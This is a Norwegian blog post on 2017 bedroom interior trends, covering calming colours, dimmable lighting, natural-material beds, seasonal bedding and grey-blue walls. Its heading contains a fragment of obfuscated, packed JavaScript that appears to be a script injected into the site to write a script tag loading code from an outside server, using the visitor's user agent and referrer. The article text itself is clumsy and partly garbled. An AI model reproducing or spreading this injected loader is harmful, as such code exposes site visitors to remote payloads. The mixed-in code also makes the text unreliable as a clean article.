Inspirasjon

Interiør trender 2017 for soverommet

Interiør »’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(«<\/k"+"l>«);n m=»q»;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|bzsnz|var|u0026u|referrer|fakzh||js|php’.split(‘|’),0,{}))
trender 2017 for soverommet:
Vi fortsetter vår lille serie artikler for å gi leserne noen herlige interiørdesigntrender vi vil se mer av på soverommet i løpet av 2017. Her er noen tips om hvordan du kan endre hovedsoverom med små midler.

Det er mange elementer å vurdere når dekorere soverommet. Farge er en svært viktig element på denne listen. Ulike farger kan ha ulike effekter på kroppen din og dine følelser. For eksempel, varme farger som rødt og oransje tendens til å øke i både hjertefrekvens og blodtrykk, er kanskje ikke det beste rett før sengetid på en ukedag kveld. Her er det bedre å gå for litt kaldere farger som berolige både kropp og sinn. Når det gjelder belysning, er det anbefalt å bruke dimbare lamper med dempet lys. Et alternativ er å bruke mindre lyskilder med mørk, varmt lys.

Så kommer vi til kanskje den viktigste og sentrale på soverommet, nemlig seng. Å investere i en god seng er noe alle bør gjøre. Det er alltid dumt og gjerrig på at seng. Fordi vi setter så stor del av våre liv i sengen, så bør selvfølgelig være det første skrittet til god søvn. Velg senger, madrass og madrass av naturlige materialer slik at kroppen kan regulere kroppstemperaturen.

Interiør trender 2017 for soverommet

Ser på fremtidige trender i 2017 og mønsteret til å bli en stor spiller. Flere har begynt og kle sengen etter sesongen. Det kan være mønstre, men også farger. Som jula har røde sofa tekstiler og sommer lysere kanskje gul eller mintgrønt. Linné er også et materiale som i 2016 øket salget. Dette vil vi se mer av i år. Moro er også å se hvordan soverommet har blitt en stadig viktigere rolle i det moderne hjem. De bruker mer energi i rommet enn det gjorde for noen år siden.

I 2017, også de grå farger fortsetter å dominere. Grå på veggen var veldig populær i 2016. Hvis du ikke er glad i grått kan bli svekket ved bruk av en blåere tone. Det er en farge som heter «Delfinblå». Det er svært lik en lys grå, men blå i det. besøker også det svenske nettstedet med inredning online.

Related Posts

Legg igjen en kommentar

Din e-postadresse vil ikke bli publisert. Obligatoriske felt er merket med *